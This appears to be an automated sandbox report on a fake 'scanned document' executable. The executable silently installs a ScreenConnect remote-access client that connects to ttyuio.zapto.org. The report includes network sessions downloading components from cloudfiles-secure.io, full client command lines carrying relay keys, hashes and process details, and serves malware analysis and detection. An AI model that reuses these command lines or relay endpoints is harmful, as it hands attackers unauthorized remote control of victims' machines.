Oct 2, 2024 06:22:55.595554113 CEST | 1.1.1.1 | 192.168.2.5 | 0x2962 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 2, 2024 06:22:55.595554113 CEST | 1.1.1.1 | 192.168.2.5 | 0x2962 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 06:23:16.542222023 CEST | 1.1.1.1 | 192.168.2.5 | 0xcb4a | No error (0) | ttyuio.zapto.org |  | 178.215.236.119 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                        • cloudfiles-secure.io
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:22:52 UTC | 633 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-02 04:22:53 UTC | 251 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242016
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:22:52 GMT
Connection: close
2024-10-02 04:22:53 UTC | 16133 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49709 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:22:54 UTC | 102 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:22:54 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17866
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:22:54 GMT
Connection: close
2024-10-02 04:22:54 UTC | 16168 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49722 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:22:59 UTC | 128 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-02 04:23:00 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:22:59 GMT
Connection: close
2024-10-02 04:23:00 UTC | 16168 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                                        Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                                        2024-10-02 04:23:00 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                                                                                                                                        Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49723 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:00 UTC | 112 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:01 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61216
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:01 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49724 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:01 UTC | 116 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:02 UTC | 214 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:02 GMT
Connection: close
2024-10-02 04:23:02 UTC | 266 | IN | Data Ascii:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" />
    <supportedRuntime version="v2.0.50727" />
  </startup>
  <runtime>
    <generatePublisherEvidence enabled="false" />
  </runtime>
</con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49726 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:02 UTC | 111 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:03 UTC | 214 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:02 GMT
Connection: close
2024-10-02 04:23:03 UTC | 266 | IN | Data Ascii:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" />
    <supportedRuntime version="v2.0.50727" />
  </startup>
  <runtime>
    <generatePublisherEvidence enabled="false" />
  </runtime>
</con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49727 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:03 UTC | 119 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:04 UTC | 214 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:04 GMT
Connection: close
2024-10-02 04:23:04 UTC | 266 | IN | Data Ascii:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" />
    <supportedRuntime version="v2.0.50727" />
  </startup>
  <runtime>
    <generatePublisherEvidence enabled="false" />
  </runtime>
</con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49729 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:04 UTC | 109 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:05 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81696
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:04 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49731 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:05 UTC | 97 | OUT | GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:06 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197120
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:06 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49734 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:07 UTC | 104 | OUT | GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:07 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:07 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49739 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:08 UTC | 98 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:08 UTC | 218 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1721856
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:08 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49742 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:10 UTC | 104 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:11 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 601376
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:10 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49743 | 178.215.236.119 | 443 | 1196 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 04:23:12 UTC | 95 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: cloudfiles-secure.io
Accept-Encoding: gzip
2024-10-02 04:23:12 UTC | 217 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548864
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Wed, 02 Oct 2024 04:23:12 GMT
Connection: close



                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:00:22:49
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x830000
                                                                                                                                                                                                                                                                        File size:83'368 bytes
                                                                                                                                                                                                                                                                        MD5 hash:3D6752AEA446D36E3078F6AE7C0490A1
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                        Start time:00:22:49
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x22705d80000
                                                                                                                                                                                                                                                                        File size:24'856 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                        Start time:00:22:49
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                        Start time:00:22:50
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:00:22:50
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
                                                                                                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                        Start time:00:22:50
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                        Start time:00:22:52
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                        Start time:00:23:00
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                        Start time:00:23:13
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xff0000
                                                                                                                                                                                                                                                                        File size:601'376 bytes
                                                                                                                                                                                                                                                                        MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:00:23:14
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                                        Imagebase:0xbc0000
                                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                        Start time:00:23:14
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                                        Imagebase:0xbc0000
                                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                        Start time:00:23:15
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
                                                                                                                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                                                                                                                        File size:601'376 bytes
                                                                                                                                                                                                                                                                        MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                        Start time:00:24:17
                                                                                                                                                                                                                                                                        Start date:02/10/2024
